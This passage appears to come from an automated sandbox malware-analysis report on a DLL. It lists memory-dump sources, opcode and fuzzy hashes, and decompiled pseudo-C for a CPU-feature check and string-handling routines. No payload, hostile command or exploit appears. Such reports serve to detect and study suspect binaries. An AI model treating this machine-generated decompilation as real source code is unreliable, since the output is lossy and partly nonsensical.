                                                                                                        • Instruction ID: 8f5d51aba00c4f23d52c296157a313ffc4782a84c6f71662d1847f1d9af8e599
                                                                                                        • Opcode Fuzzy Hash: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
                                                                                                        • Instruction Fuzzy Hash: E431ADB55187818BC348DF28C54A51ABBE1FB8C308F504B2EF8CAA6294D778D6058B4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
                                                                                                        • Instruction ID: 79354f79ef65217a83ad5669e5e5daff520c5b483ab2cf90db9683dfdc12feb2
                                                                                                        • Opcode Fuzzy Hash: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
                                                                                                        • Instruction Fuzzy Hash: A331C5B190434A8BDB48DF24C88A5DE7FF0FB58388F10461CE85AA7250D3B4D6A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
                                                                                                        • Instruction ID: f7e907a5a4d268517ac5d39fb781b2abcac55db7633d781cedf7f9941ca353e5
                                                                                                        • Opcode Fuzzy Hash: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
                                                                                                        • Instruction Fuzzy Hash: 8F21A0B152C781AFD388DF28C19981ABBE1FB88304F806A1DF98687350D374D844CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
                                                                                                        • Instruction ID: e563aa27f56e2ecce816434c0e114442c931e28e35474e2e86562d3eaff730a2
                                                                                                        • Opcode Fuzzy Hash: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
                                                                                                        • Instruction Fuzzy Hash: 8931707552D784AFC788DF28D48991EBBF0FB98345F906A1DF88686264E374D445CB02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
                                                                                                        • Instruction ID: cfe9eacf390d468c13f16f556d0757c07c704974f4e6988c0e8e4883957bcd26
                                                                                                        • Opcode Fuzzy Hash: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
                                                                                                        • Instruction Fuzzy Hash: 95316174529380AFD398DF28D48A81BBBF0FB99314F806E1DF9C68A2A0D774D405CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
                                                                                                        • Instruction ID: 95bb47a97fe7a9d8d529fae77a119aa2dd9a35a31096ffbc611f9293c9fe5b2f
                                                                                                        • Opcode Fuzzy Hash: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
                                                                                                        • Instruction Fuzzy Hash: 2531F17080438E8BDB48CF64C8865DFBFB0FB48358F104A19EC5AA6250D7B89664CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
                                                                                                        • Instruction ID: aca377b28207093ad69189230e20808a2953a665cdfbd0516b7c3ce528793aa5
                                                                                                        • Opcode Fuzzy Hash: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
                                                                                                        • Instruction Fuzzy Hash: 7F2168B15187808BD348DF28D54951ABBE1BB8C30CF400B2DF8CAAA2A1D778D604CF4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 86%
                                                                                                        			E00007FFC7FFC2890AB50(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                        				intOrPtr _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				void* _t25;
                                                                                                        
                                                                                                        				_t25 = __r8;
                                                                                                        				r8d = 0;
                                                                                                        				 *0x2897f4f8 = r8d;
                                                                                                        				_t1 = _t25 + 1; // 0x1
                                                                                                        				r9d = _t1;
                                                                                                        				asm("cpuid");
                                                                                                        				_v16 = r9d;
                                                                                                        				_v16 = 0;
                                                                                                        				_v20 = __ebx;
                                                                                                        				_v12 = __edx;
                                                                                                        				if (0 != 0x18001000) goto 0x2890abb1;
                                                                                                        				asm("xgetbv");
                                                                                                        				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                        				r8d =  *0x2897f4f8; // 0x1
                                                                                                        				r8d =  ==  ? r9d : r8d;
                                                                                                        				 *0x2897f4f8 = r8d;
                                                                                                        				 *0x2897f4fc = r8d;
                                                                                                        				return 0;
                                                                                                        			}







                                                                                                        0x7ffc2890ab50
                                                                                                        0x7ffc2890ab56
                                                                                                        0x7ffc2890ab5b
                                                                                                        0x7ffc2890ab62
                                                                                                        0x7ffc2890ab62
                                                                                                        0x7ffc2890ab69
                                                                                                        0x7ffc2890ab6b
                                                                                                        0x7ffc2890ab73
                                                                                                        0x7ffc2890ab79
                                                                                                        0x7ffc2890ab7d
                                                                                                        0x7ffc2890ab83
                                                                                                        0x7ffc2890ab87
                                                                                                        0x7ffc2890ab91
                                                                                                        0x7ffc2890ab9b
                                                                                                        0x7ffc2890aba6
                                                                                                        0x7ffc2890abaa
                                                                                                        0x7ffc2890abb1
                                                                                                        0x7ffc2890abbf

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
                                                                                                        • Instruction ID: d7129d1b04424e42b4fb1477b70f8c627df7d2d5dcaab00b9d6006eaf227ff74
                                                                                                        • Opcode Fuzzy Hash: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
                                                                                                        • Instruction Fuzzy Hash: F4F044B16182668BDBA49F28BC42B2977D1F748381B64807AD69D97F44D63C9060CF18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 49%
                                                                                                        			E00007FFC7FFC28903240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				long long _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _v80;
                                                                                                        				long long _v88;
                                                                                                        				long long _v96;
                                                                                                        				long long _v104;
                                                                                                        				long long _v112;
                                                                                                        				long long _v120;
                                                                                                        				long long _v128;
                                                                                                        				long long _v136;
                                                                                                        				long long _t207;
                                                                                                        				intOrPtr* _t209;
                                                                                                        				intOrPtr _t218;
                                                                                                        				intOrPtr _t221;
                                                                                                        				long long _t223;
                                                                                                        				void* _t225;
                                                                                                        				intOrPtr _t228;
                                                                                                        				long long _t229;
                                                                                                        				void* _t230;
                                                                                                        				intOrPtr _t235;
                                                                                                        				long long _t237;
                                                                                                        				void* _t239;
                                                                                                        				void* _t243;
                                                                                                        				long long _t245;
                                                                                                        				void* _t247;
                                                                                                        				long long _t248;
                                                                                                        				void* _t249;
                                                                                                        				long long _t250;
                                                                                                        				void* _t251;
                                                                                                        				long long _t257;
                                                                                                        
                                                                                                        				_t207 = __rax;
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC289021F0(__eflags, __rax, _a8, _a16);
                                                                                                        				E00007FFC7FFC289021F0(__eflags, __rax, _a32, _a40);
                                                                                                        				E00007FFC7FFC28902400(__eflags, __rax, _a8, _a16, _a24);
                                                                                                        				_a24 = _t207;
                                                                                                        				E00007FFC7FFC28902400(__eflags, _t207, _a32, _a40, _a48);
                                                                                                        				_a48 = _t207;
                                                                                                        				_t209 = 0xffffffff - _a48;
                                                                                                        				_v120 = 0xffffffff;
                                                                                                        				E00007FFC7FFC28902170(_t209, _a8);
                                                                                                        				_t211 =  *_t209 - _a24;
                                                                                                        				if (_v120 - 0xffffffff > 0) goto 0x28903315;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902170( *_t209 - _a24, _a8);
                                                                                                        				_v136 = 0xffffffff;
                                                                                                        				E00007FFC7FFC28902170( *_t211 - _a24 - _a16, _a8);
                                                                                                        				_v128 = 0xffffffff;
                                                                                                        				E00007FFC7FFC28902170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
                                                                                                        				if ( *0xffffffff - _v128 >= 0) goto 0x2890338e;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC289022B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
                                                                                                        				_t218 = _a24;
                                                                                                        				if (_a48 != _t218) goto 0x289033ec;
                                                                                                        				E00007FFC7FFC289018D0(_t218, _a32);
                                                                                                        				_v112 = _t218 + _a40;
                                                                                                        				E00007FFC7FFC289018F0(_t218 + _a40, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t218 + _a40 + _a16, _v112, _a48);
                                                                                                        				goto 0x28903810;
                                                                                                        				_t221 = _a32;
                                                                                                        				if (_a8 == _t221) goto 0x289034a2;
                                                                                                        				E00007FFC7FFC289018F0(_t221, _a8);
                                                                                                        				_t223 = _t221 + _a16 + _a24;
                                                                                                        				_v104 = _t223;
                                                                                                        				E00007FFC7FFC289018F0(_t223, _a8);
                                                                                                        				_t225 = _t223 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC28901230(_t225, _v104, _v136);
                                                                                                        				E00007FFC7FFC289018D0(_t225, _a32);
                                                                                                        				_v96 = _t225 + _a40;
                                                                                                        				E00007FFC7FFC289018F0(_t225 + _a40, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_t225 + _a40 + _a16, _v96, _a48);
                                                                                                        				goto 0x28903810;
                                                                                                        				_t228 = _a24;
                                                                                                        				if (_a48 - _t228 >= 0) goto 0x28903558;
                                                                                                        				E00007FFC7FFC289018F0(_t228, _a8);
                                                                                                        				_t229 = _t228 + _a40;
                                                                                                        				_v88 = _t229;
                                                                                                        				E00007FFC7FFC289018F0(_t229, _a8);
                                                                                                        				_t230 = _t229 + _a16;
                                                                                                        				E00007FFC7FFC28901230(_t230, _v88, _a48);
                                                                                                        				E00007FFC7FFC289018F0(_t230, _a8);
                                                                                                        				_v80 = _t230 + _a16 + _a24;
                                                                                                        				E00007FFC7FFC289018F0(_t230 + _a16 + _a24, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
                                                                                                        				goto 0x28903810;
                                                                                                        				_t235 = _a16;
                                                                                                        				if (_a40 - _t235 > 0) goto 0x2890360e;
                                                                                                        				E00007FFC7FFC289018F0(_t235, _a8);
                                                                                                        				_t237 = _t235 + _a16 + _a24;
                                                                                                        				_v72 = _t237;
                                                                                                        				E00007FFC7FFC289018F0(_t237, _a8);
                                                                                                        				_t239 = _t237 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC28901230(_t239, _v72, _v136);
                                                                                                        				E00007FFC7FFC289018F0(_t239, _a8);
                                                                                                        				_v64 = _t239 + _a40;
                                                                                                        				E00007FFC7FFC289018F0(_t239 + _a40, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t239 + _a40 + _a16, _v64, _a48);
                                                                                                        				goto 0x28903810;
                                                                                                        				_t243 = _a16 + _a24;
                                                                                                        				if (_t243 - _a40 > 0) goto 0x289036eb;
                                                                                                        				E00007FFC7FFC289018F0(_t243, _a8);
                                                                                                        				_t245 = _t243 + _a16 + _a24;
                                                                                                        				_v56 = _t245;
                                                                                                        				E00007FFC7FFC289018F0(_t245, _a8);
                                                                                                        				_t247 = _t245 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC28901230(_t247, _v56, _v136);
                                                                                                        				E00007FFC7FFC289018F0(_t247, _a8);
                                                                                                        				_t248 = _t247 + _a40 + _a48 - _a24;
                                                                                                        				_v48 = _t248;
                                                                                                        				E00007FFC7FFC289018F0(_t248, _a8);
                                                                                                        				_t249 = _t248 + _a16;
                                                                                                        				E00007FFC7FFC28901230(_t249, _v48, _a48);
                                                                                                        				goto 0x28903810;
                                                                                                        				E00007FFC7FFC289018F0(_t249, _a8);
                                                                                                        				_t250 = _t249 + _a40;
                                                                                                        				_v40 = _t250;
                                                                                                        				E00007FFC7FFC289018F0(_t250, _a8);
                                                                                                        				_t251 = _t250 + _a16;
                                                                                                        				E00007FFC7FFC28901230(_t251, _v40, _a24);
                                                                                                        				E00007FFC7FFC289018F0(_t251, _a8);
                                                                                                        				_v32 = _t251 + _a16 + _a24;
                                                                                                        				E00007FFC7FFC289018F0(_t251 + _a16 + _a24, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
                                                                                                        				_t257 = _a48 - _a24;
                                                                                                        				_v24 = _t257;
                                                                                                        				E00007FFC7FFC289018F0(_t257, _a8);
                                                                                                        				_t259 = _t257 + _a40 + _a48;
                                                                                                        				_v16 = _t257 + _a40 + _a48;
                                                                                                        				E00007FFC7FFC289018F0(_t257 + _a40 + _a48, _a8);
                                                                                                        				E00007FFC7FFC28901230(_t259 + _a16 + _a24, _v16, _v24);
                                                                                                        				return E00007FFC7FFC289023A0(_t259 + _a16 + _a24, _a8, _v128);
                                                                                                        			}







































                                                                                                        0x7ffc28903240
                                                                                                        0x7ffc28903240
                                                                                                        0x7ffc28903245
                                                                                                        0x7ffc2890324a
                                                                                                        0x7ffc2890324f
                                                                                                        0x7ffc2890326b
                                                                                                        0x7ffc28903280
                                                                                                        0x7ffc2890329d
                                                                                                        0x7ffc289032a2
                                                                                                        0x7ffc289032c2
                                                                                                        0x7ffc289032c7
                                                                                                        0x7ffc289032d6
                                                                                                        0x7ffc289032de
                                                                                                        0x7ffc289032eb
                                                                                                        0x7ffc289032fb
                                                                                                        0x7ffc28903306
                                                                                                        0x7ffc28903310
                                                                                                        0x7ffc2890331d
                                                                                                        0x7ffc28903338
                                                                                                        0x7ffc28903345
                                                                                                        0x7ffc2890335d
                                                                                                        0x7ffc2890336a
                                                                                                        0x7ffc28903377
                                                                                                        0x7ffc28903379
                                                                                                        0x7ffc28903389
                                                                                                        0x7ffc2890338e
                                                                                                        0x7ffc2890339e
                                                                                                        0x7ffc289033a8
                                                                                                        0x7ffc289033b5
                                                                                                        0x7ffc289033c2
                                                                                                        0x7ffc289033e2
                                                                                                        0x7ffc289033e7
                                                                                                        0x7ffc289033ec
                                                                                                        0x7ffc289033fc
                                                                                                        0x7ffc2890340a
                                                                                                        0x7ffc28903417
                                                                                                        0x7ffc2890341f
                                                                                                        0x7ffc2890342c
                                                                                                        0x7ffc28903439
                                                                                                        0x7ffc28903451
                                                                                                        0x7ffc2890345e
                                                                                                        0x7ffc2890346b
                                                                                                        0x7ffc28903478
                                                                                                        0x7ffc28903498
                                                                                                        0x7ffc2890349d
                                                                                                        0x7ffc289034a2
                                                                                                        0x7ffc289034b2
                                                                                                        0x7ffc289034c0
                                                                                                        0x7ffc289034c5
                                                                                                        0x7ffc289034cd
                                                                                                        0x7ffc289034da
                                                                                                        0x7ffc289034df
                                                                                                        0x7ffc289034fa
                                                                                                        0x7ffc28903507
                                                                                                        0x7ffc2890351c
                                                                                                        0x7ffc28903529
                                                                                                        0x7ffc2890354e
                                                                                                        0x7ffc28903553
                                                                                                        0x7ffc28903558
                                                                                                        0x7ffc28903568
                                                                                                        0x7ffc28903576
                                                                                                        0x7ffc28903583
                                                                                                        0x7ffc2890358b
                                                                                                        0x7ffc28903598
                                                                                                        0x7ffc289035a5
                                                                                                        0x7ffc289035bd
                                                                                                        0x7ffc289035ca
                                                                                                        0x7ffc289035d7
                                                                                                        0x7ffc289035e4
                                                                                                        0x7ffc28903604
                                                                                                        0x7ffc28903609
                                                                                                        0x7ffc28903621
                                                                                                        0x7ffc2890362c
                                                                                                        0x7ffc2890363a
                                                                                                        0x7ffc28903647
                                                                                                        0x7ffc2890364f
                                                                                                        0x7ffc2890365c
                                                                                                        0x7ffc28903669
                                                                                                        0x7ffc28903681
                                                                                                        0x7ffc2890368e
                                                                                                        0x7ffc289036b1
                                                                                                        0x7ffc289036b4
                                                                                                        0x7ffc289036c1
                                                                                                        0x7ffc289036c6
                                                                                                        0x7ffc289036e1
                                                                                                        0x7ffc289036e6
                                                                                                        0x7ffc289036f3
                                                                                                        0x7ffc289036f8
                                                                                                        0x7ffc28903700
                                                                                                        0x7ffc28903710
                                                                                                        0x7ffc28903715
                                                                                                        0x7ffc28903733
                                                                                                        0x7ffc28903740
                                                                                                        0x7ffc28903755
                                                                                                        0x7ffc28903765
                                                                                                        0x7ffc2890378d
                                                                                                        0x7ffc289037a5
                                                                                                        0x7ffc289037a8
                                                                                                        0x7ffc289037b8
                                                                                                        0x7ffc289037c5
                                                                                                        0x7ffc289037cd
                                                                                                        0x7ffc289037dd
                                                                                                        0x7ffc2890380b
                                                                                                        0x7ffc28903831

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1550686663-0
                                                                                                        • Opcode ID: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
                                                                                                        • Instruction ID: a4050e9b8abc6c8067f030f1639df138debc0b1597bb05ccc9b5535166bd2b08
                                                                                                        • Opcode Fuzzy Hash: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
                                                                                                        • Instruction Fuzzy Hash: 84D1C566A1DBC581DA70EB55F8913AAB361FBC8795F004127EA8D43BAADF2DD040CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 48%
                                                                                                        			E00007FFC7FFC28902FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				long long _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _t100;
                                                                                                        				intOrPtr* _t102;
                                                                                                        				intOrPtr* _t104;
                                                                                                        				long long _t108;
                                                                                                        				long long _t110;
                                                                                                        				intOrPtr* _t112;
                                                                                                        				intOrPtr _t116;
                                                                                                        				long long _t118;
                                                                                                        
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC28902250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x2890303c;
                                                                                                        				E00007FFC7FFC289018F0(__rax, _a8);
                                                                                                        				_t100 = _a32 - __rax;
                                                                                                        				_v64 = _a40;
                                                                                                        				_v72 = _t100;
                                                                                                        				E00007FFC7FFC28903240(__edx, E00007FFC7FFC28902250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
                                                                                                        				goto 0x28903214;
                                                                                                        				E00007FFC7FFC289021F0(E00007FFC7FFC28902250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
                                                                                                        				E00007FFC7FFC28902400(E00007FFC7FFC28902250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
                                                                                                        				_a24 = _t100;
                                                                                                        				_t102 = 0xffffffff - _a40;
                                                                                                        				_v40 = 0xffffffff;
                                                                                                        				E00007FFC7FFC28902170(_t102, _a8);
                                                                                                        				_t104 =  *_t102 - _a24;
                                                                                                        				if (_v40 - 0xffffffff > 0) goto 0x289030aa;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902170(_t104, _a8);
                                                                                                        				_v56 =  *_t104 - _a24 - _a16;
                                                                                                        				_t108 = _a24;
                                                                                                        				if (_a40 - _t108 >= 0) goto 0x28903126;
                                                                                                        				E00007FFC7FFC289018F0(_t108, _a8);
                                                                                                        				_t110 = _t108 + _a16 + _a24;
                                                                                                        				_v32 = _t110;
                                                                                                        				E00007FFC7FFC289018F0(_t110, _a8);
                                                                                                        				_t112 = _t110 + _a16 + _a40;
                                                                                                        				E00007FFC7FFC28901230(_t112, _v32, _v56);
                                                                                                        				E00007FFC7FFC28902170(_t112, _a8);
                                                                                                        				_v48 =  *_t112 + _a40 - _a24;
                                                                                                        				if (_a40 > 0) goto 0x28903162;
                                                                                                        				if (_a24 <= 0) goto 0x2890320f;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC289022B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x2890320f;
                                                                                                        				_t116 = _a40;
                                                                                                        				if (_a24 - _t116 >= 0) goto 0x289031d9;
                                                                                                        				E00007FFC7FFC289018F0(_t116, _a8);
                                                                                                        				_t118 = _t116 + _a16 + _a24;
                                                                                                        				_v24 = _t118;
                                                                                                        				E00007FFC7FFC289018F0(_t118, _a8);
                                                                                                        				_t120 = _t118 + _a16 + _a40;
                                                                                                        				E00007FFC7FFC28901230(_t118 + _a16 + _a40, _v24, _v56);
                                                                                                        				E00007FFC7FFC289018F0(_t118 + _a16 + _a40, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_t120 + _a16, _a32, _a40);
                                                                                                        				return E00007FFC7FFC289023A0(_t120 + _a16, _a8, _v48);
                                                                                                        			}


















                                                                                                        0x7ffc28902fc0
                                                                                                        0x7ffc28902fc5
                                                                                                        0x7ffc28902fca
                                                                                                        0x7ffc28902fcf
                                                                                                        0x7ffc28902fef
                                                                                                        0x7ffc28902ff6
                                                                                                        0x7ffc28903006
                                                                                                        0x7ffc28903011
                                                                                                        0x7ffc28903016
                                                                                                        0x7ffc28903032
                                                                                                        0x7ffc28903037
                                                                                                        0x7ffc28903046
                                                                                                        0x7ffc2890305d
                                                                                                        0x7ffc28903062
                                                                                                        0x7ffc28903071
                                                                                                        0x7ffc28903079
                                                                                                        0x7ffc28903083
                                                                                                        0x7ffc28903093
                                                                                                        0x7ffc2890309e
                                                                                                        0x7ffc289030a5
                                                                                                        0x7ffc289030af
                                                                                                        0x7ffc289030c7
                                                                                                        0x7ffc289030cc
                                                                                                        0x7ffc289030dc
                                                                                                        0x7ffc289030e3
                                                                                                        0x7ffc289030ed
                                                                                                        0x7ffc289030f5
                                                                                                        0x7ffc289030ff
                                                                                                        0x7ffc28903109
                                                                                                        0x7ffc28903121
                                                                                                        0x7ffc2890312b
                                                                                                        0x7ffc28903143
                                                                                                        0x7ffc28903151
                                                                                                        0x7ffc2890315c
                                                                                                        0x7ffc28903162
                                                                                                        0x7ffc28903179
                                                                                                        0x7ffc2890317f
                                                                                                        0x7ffc2890318f
                                                                                                        0x7ffc28903196
                                                                                                        0x7ffc289031a0
                                                                                                        0x7ffc289031a8
                                                                                                        0x7ffc289031b2
                                                                                                        0x7ffc289031bc
                                                                                                        0x7ffc289031d4
                                                                                                        0x7ffc289031de
                                                                                                        0x7ffc289031fb
                                                                                                        0x7ffc28903218

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890226B
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28902FF6
                                                                                                          • Part of subcall function 00007FFC289018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289018FE
                                                                                                          • Part of subcall function 00007FFC28903240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28903310
                                                                                                          • Part of subcall function 00007FFC28903240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289033A8
                                                                                                          • Part of subcall function 00007FFC28903240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC289033C2
                                                                                                          • Part of subcall function 00007FFC28903240: char_traits.LIBCPMTD ref: 00007FFC289033E2
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC289030A5
